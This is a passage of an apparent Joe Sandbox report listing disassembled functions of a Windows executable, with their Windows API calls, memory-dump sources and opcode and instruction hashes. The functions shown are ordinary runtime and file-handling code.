                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: String
                                                                                          • String ID: LCMapStringEx
                                                                                          • API String ID: 2568140703-3893581201
                                                                                          • Opcode ID: 922623a428a7fbd3041b203b36c7a866382d9e24a78abb0b6b1eae0df8ed89f8
                                                                                          • Instruction ID: 4bf4c54f17bf75dc0481763709e557901f3fea2ac1356b5b578069f23c531065
                                                                                          • Opcode Fuzzy Hash: 922623a428a7fbd3041b203b36c7a866382d9e24a78abb0b6b1eae0df8ed89f8
                                                                                          • Instruction Fuzzy Hash: 49011372500219BBDF02AF94DC06EEE7FA2FB49710F044114FE19A5260CA369A31AB85
                                                                                          APIs
                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0089709A), ref: 008979F2
                                                                                          Strings
                                                                                          • InitializeCriticalSectionEx, xrefs: 008979C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountCriticalInitializeSectionSpin
                                                                                          • String ID: InitializeCriticalSectionEx
                                                                                          • API String ID: 2593887523-3084827643
                                                                                          • Opcode ID: 9da74f3dd0469c2c0f592cca11339211b6623126aab14a048aab7c7cb83aa8cb
                                                                                          • Instruction ID: 708dfcaee2da512f09c94db44626926ccb4df6fb98a152268dc8535a8eaac067
                                                                                          • Opcode Fuzzy Hash: 9da74f3dd0469c2c0f592cca11339211b6623126aab14a048aab7c7cb83aa8cb
                                                                                          • Instruction Fuzzy Hash: B5F0B47164521CBBDF117F54DC06DAE7F61FF45710B404124FC1596660DA754E109BC5
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Alloc
                                                                                          • String ID: FlsAlloc
                                                                                          • API String ID: 2773662609-671089009
                                                                                          • Opcode ID: e38dab7453c66bec8f2015f32451147af9d709f668e36e754defd25ae3edd96e
                                                                                          • Instruction ID: 641f4491086d4c6e38b7f8aff714c4f540e2810e364e544aaabf60b56bfc886d
                                                                                          • Opcode Fuzzy Hash: e38dab7453c66bec8f2015f32451147af9d709f668e36e754defd25ae3edd96e
                                                                                          • Instruction Fuzzy Hash: 32E0E574B452187BAB15BF649C0A96EBB94FB46720F440174FD05E6740DE751E00C6CA
                                                                                          APIs
                                                                                          • try_get_function.LIBVCRUNTIME ref: 00891DAF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: try_get_function
                                                                                          • String ID: FlsAlloc
                                                                                          • API String ID: 2742660187-671089009
                                                                                          • Opcode ID: 847cac18e61ead5d1028cad3fdee97c598cc7e1809a2b526d1bd1271403d125c
                                                                                          • Instruction ID: b64852a23953162d0ce4a734e20549e2967b8f2bb1ac8ee7a1c6c126800dc326
                                                                                          • Opcode Fuzzy Hash: 847cac18e61ead5d1028cad3fdee97c598cc7e1809a2b526d1bd1271403d125c
                                                                                          • Instruction Fuzzy Hash: F0D02B21B823396AAF0036C4AC0A9DA7F54FB01BF1F080061FF1CE1B82C995140086C2
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0088CD6E
                                                                                            • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                                                            • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID: 3Ro
                                                                                          • API String ID: 1269201914-1492261280
                                                                                          • Opcode ID: 00dcee143811831a47eb563a91832a4a850b261b50707218225b39b15a9a9c4d
                                                                                          • Instruction ID: 37f86bf0d8e26177d13d65e9810b5ffa8349f949cf6a379f3676164d83a0fb48
                                                                                          • Opcode Fuzzy Hash: 00dcee143811831a47eb563a91832a4a850b261b50707218225b39b15a9a9c4d
                                                                                          • Instruction Fuzzy Hash: EDB012C1259015FD312CB2489E02C37050CF0C2F54330446FF402D4A44A8642C06C133
                                                                                          APIs
                                                                                            • Part of subcall function 008981EB: GetOEMCP.KERNEL32(00000000,?,?,00898474,?), ref: 00898216
                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,008984B9,?,00000000), ref: 0089868C
                                                                                          • GetCPInfo.KERNEL32(00000000,008984B9,?,?,?,008984B9,?,00000000), ref: 0089869F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CodeInfoPageValid
                                                                                          • String ID:
                                                                                          • API String ID: 546120528-0
                                                                                          • Opcode ID: e0597cbf37d85d1e85ae0b0bc0198c747c95f519085818ad574ca00af393d69a
                                                                                          • Instruction ID: 9d3b420311e28744015d7298d523c78bb42a99fedb93601c29e9e3f8b6ecbd13
                                                                                          • Opcode Fuzzy Hash: e0597cbf37d85d1e85ae0b0bc0198c747c95f519085818ad574ca00af393d69a
                                                                                          • Instruction Fuzzy Hash: 4E51227090024AEEDF21AFB5C885ABABBE5FF52314F2C406ED086CB651DA359941CB91
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00871383
                                                                                            • Part of subcall function 00875FB1: __EH_prolog.LIBCMT ref: 00875FB6
                                                                                            • Part of subcall function 0087C413: __EH_prolog.LIBCMT ref: 0087C418
                                                                                            • Part of subcall function 0087C413: new.LIBCMT ref: 0087C45B
                                                                                            • Part of subcall function 0087C413: new.LIBCMT ref: 0087C47F
                                                                                          • new.LIBCMT ref: 008713FB
                                                                                            • Part of subcall function 0087AC66: __EH_prolog.LIBCMT ref: 0087AC6B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: ebfc82be96a60e9896af77f771c42496d5c46aca29b3dab0526abb154ee9ea85
                                                                                          • Instruction ID: b5b24abcc5db96e124bf3b9f3521f53cec6c078e51af2448bae344828a025b5e
                                                                                          • Opcode Fuzzy Hash: ebfc82be96a60e9896af77f771c42496d5c46aca29b3dab0526abb154ee9ea85
                                                                                          • Instruction Fuzzy Hash: B94116B0805B409ED724DF7984859E6FBE5FF28300F50896ED5EEC7282CB32A554CB15
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00871383
                                                                                            • Part of subcall function 00875FB1: __EH_prolog.LIBCMT ref: 00875FB6
                                                                                            • Part of subcall function 0087C413: __EH_prolog.LIBCMT ref: 0087C418
                                                                                            • Part of subcall function 0087C413: new.LIBCMT ref: 0087C45B
                                                                                            • Part of subcall function 0087C413: new.LIBCMT ref: 0087C47F
                                                                                          • new.LIBCMT ref: 008713FB
                                                                                            • Part of subcall function 0087AC66: __EH_prolog.LIBCMT ref: 0087AC6B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 63445c4a1e158e5fc306531120d1cfdc6728c8287cb1990bcf44b35309402fa3
                                                                                          • Instruction ID: 22fa74d10d65f64aac4edd4b4eef074dade7d23098ffab7602bf20dcbea4a09d
                                                                                          • Opcode Fuzzy Hash: 63445c4a1e158e5fc306531120d1cfdc6728c8287cb1990bcf44b35309402fa3
                                                                                          • Instruction Fuzzy Hash: 784117B0805B409ED724DF798485AE6FBE5FF28300F50896ED5EEC7282CB726554CB16
                                                                                          APIs
                                                                                            • Part of subcall function 0089631F: GetLastError.KERNEL32(?,008ACBE8,00892674,008ACBE8,?,?,00892213,?,?,008ACBE8), ref: 00896323
                                                                                            • Part of subcall function 0089631F: _free.LIBCMT ref: 00896356
                                                                                            • Part of subcall function 0089631F: SetLastError.KERNEL32(00000000,?,008ACBE8), ref: 00896397
                                                                                            • Part of subcall function 0089631F: _abort.LIBCMT ref: 0089639D
                                                                                            • Part of subcall function 00898576: _abort.LIBCMT ref: 008985A8
                                                                                            • Part of subcall function 00898576: _free.LIBCMT ref: 008985DC
                                                                                            • Part of subcall function 008981EB: GetOEMCP.KERNEL32(00000000,?,?,00898474,?), ref: 00898216
                                                                                          • _free.LIBCMT ref: 008984CF
                                                                                          • _free.LIBCMT ref: 00898505
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorLast_abort
                                                                                          • String ID:
                                                                                          • API String ID: 2991157371-0
                                                                                          • Opcode ID: 63524577c2b3cd390a93ff17f5083e08459cf009ca0c3be22ea32fb3097a5b50
                                                                                          • Instruction ID: 0103f73d61112f67b6299efc24f743561099f8d6ba478656a57a7b2d1f063a0e
                                                                                          • Opcode Fuzzy Hash: 63524577c2b3cd390a93ff17f5083e08459cf009ca0c3be22ea32fb3097a5b50
                                                                                          • Instruction Fuzzy Hash: 3E316F3190420AEFDF11FBA8D841A9D7BE4FF42320F294199E804DB691EF359D41CB55
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00879B87,?,?,00877735), ref: 00879579
                                                                                          • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00879B87,?,?,00877735), ref: 008795AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 1bdef6b471f2c0093db29c57392cbf02d2e70bcce566789c7d714823d1fed363
                                                                                          • Instruction ID: f4cb42ecae24f850adada3cb614977015048817ad61e3e02a757cb325b433e4d
                                                                                          • Opcode Fuzzy Hash: 1bdef6b471f2c0093db29c57392cbf02d2e70bcce566789c7d714823d1fed363
                                                                                          • Instruction Fuzzy Hash: DC21E1B1004748AFE7318F18C885BA7B7E8FB49768F00892DF5E9C2595C274ED498B61
                                                                                          APIs
                                                                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00877436,?,?,?), ref: 00879A2C
                                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 00879ADC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$BuffersFlushTime
                                                                                          • String ID:
                                                                                          • API String ID: 1392018926-0
                                                                                          • Opcode ID: 55e5fb5007035a63f98216cced1e4d5bd6538408c1a74faecc7843362542bfe7
                                                                                          • Instruction ID: 4f06cc1205a8f4db755da0d47f25b1a08213574ca9f1b7c294c185b312f5a998
                                                                                          • Opcode Fuzzy Hash: 55e5fb5007035a63f98216cced1e4d5bd6538408c1a74faecc7843362542bfe7
                                                                                          • Instruction Fuzzy Hash: 5121F331149395AFC711DE28C881AAAFBD8FF96704F08891CF8D9C7195DB29ED08C752
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00897795
                                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008977A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                                                          • String ID:
                                                                                          • API String ID: 2279764990-0
                                                                                          • Opcode ID: 55746ee8cc19e97c4bba8134b3d41162d69ef472e9d4000a8d79fba2a945edfe
                                                                                          • Instruction ID: 263494e551e521f7925728f4bc579f84b80206630cc37077571801f80875f6ef
                                                                                          • Opcode Fuzzy Hash: 55746ee8cc19e97c4bba8134b3d41162d69ef472e9d4000a8d79fba2a945edfe
                                                                                          • Instruction Fuzzy Hash: 89110637A14621BBEF25AFA8EC809AA7395FB85720B1E0220FD15EB654DB31DC4187D1
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00879B21
                                                                                          • GetLastError.KERNEL32 ref: 00879B2D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastPointer
                                                                                          • String ID:
                                                                                          • API String ID: 2976181284-0
                                                                                          • Opcode ID: f9546a0e65f14ae8a5bed655e33217ff0ba243ac5f686f1c6d091c16b2bf65ef
                                                                                          • Instruction ID: 4532641b668d39763ffc84c78fa9e7c8b0703b1eb2641e99db1657c4ae5a6753
                                                                                          • Opcode Fuzzy Hash: f9546a0e65f14ae8a5bed655e33217ff0ba243ac5f686f1c6d091c16b2bf65ef
                                                                                          • Instruction Fuzzy Hash: 5B01DE713007146BEB349E28EC84B6AB3D9FB85328F10853EF19AC3684DA31E8088621
                                                                                          APIs
                                                                                          • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 008798EB
                                                                                          • GetLastError.KERNEL32 ref: 008798F8
                                                                                            • Part of subcall function 008796AA: __EH_prolog.LIBCMT ref: 008796AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileH_prologLastPointer
                                                                                          • String ID:
                                                                                          • API String ID: 4236474358-0
                                                                                          • Opcode ID: 01851d13d912907aeca4f8c39d7fd559d944dc8c52746bacf9a9bfcd59deaf98
                                                                                          • Instruction ID: fbe1ee754cf5232d220b40db6a640b79243e7bbd96f38e21a6ed9da29167e498
                                                                                          • Opcode Fuzzy Hash: 01851d13d912907aeca4f8c39d7fd559d944dc8c52746bacf9a9bfcd59deaf98
                                                                                          • Instruction Fuzzy Hash: 9301D4326046099BDB188E598C44AAB7B59FF57330714C27DF9BECB698D730EC019762
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00895B0B
                                                                                            • Part of subcall function 008959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E
                                                                                          • HeapReAlloc.KERNEL32(00000000,?,00200000,?,?,008ACBE8,008717A1,?,?,?,?,00000000,?,00871378,?,?), ref: 00895B47
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocAllocate_free
                                                                                          • String ID:
                                                                                          • API String ID: 2447670028-0
                                                                                          • Opcode ID: d542d0f635691993892db0d426ac13ebac56be4a870b3b6c7ecce4f0c92c8c5b
                                                                                          • Instruction ID: 1532fe419d9886295e121df6d8a44a5b2c343607bd34c64bb32f74e8840da2fa
                                                                                          • Opcode Fuzzy Hash: d542d0f635691993892db0d426ac13ebac56be4a870b3b6c7ecce4f0c92c8c5b
                                                                                          • Instruction Fuzzy Hash: 7EF04F32701A15A6AF233A29AC01F6A3758FF91771B5C4115F818E61A1DB30880183A2
                                                                                          APIs
                                                                                          • LoadStringW.USER32(?,?,00000200,?), ref: 0087D187
                                                                                          • LoadStringW.USER32(?,?,00000200,?), ref: 0087D19D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadString
                                                                                          • String ID:
                                                                                          • API String ID: 2948472770-0
                                                                                          • Opcode ID: 12f5b91809057631d200d9252083187bbdecf5480d7690ab6b2d8daee46ae9e6
                                                                                          • Instruction ID: b2c19bcb63243b4e5efd8067fb073734205851ea10b589ac25b4258aa65973a6
                                                                                          • Opcode Fuzzy Hash: 12f5b91809057631d200d9252083187bbdecf5480d7690ab6b2d8daee46ae9e6
                                                                                          • Instruction Fuzzy Hash: 22F0C8327112287FFA115F50AC45FA7BE59FF163A0F010825FA88D7961D6128C06D7B0
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 0087FCB3
                                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 0087FCBA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$AffinityCurrentMask
                                                                                          • String ID:
                                                                                          • API String ID: 1231390398-0
                                                                                          • Opcode ID: 9ceeb939420cb3d4dec4e6f72c935f81a3cde27fbbdd5ec49de9f0070769db33
                                                                                          • Instruction ID: ff749066a2e773c6af256f8250b4877fadebb59f5a10f3bddafefff65b1b4c5b
                                                                                          • Opcode Fuzzy Hash: 9ceeb939420cb3d4dec4e6f72c935f81a3cde27fbbdd5ec49de9f0070769db33
                                                                                          • Instruction Fuzzy Hash: 80E09232E1412E679F1A8AA59C059EF739DFB85300724C17AEE0ED3605FA34DD014BA0
                                                                                          APIs
